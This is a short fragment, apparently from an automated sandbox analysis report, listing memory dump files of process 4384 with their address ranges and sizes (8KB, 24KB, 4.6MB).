8KB
-
memory/4384-120-0x0000000003AF0000-0x0000000003AF6000-memory.dmpFilesize
24KB
-
memory/4384-119-0x0000000000DC0000-0x0000000001250000-memory.dmpFilesize
4.6MB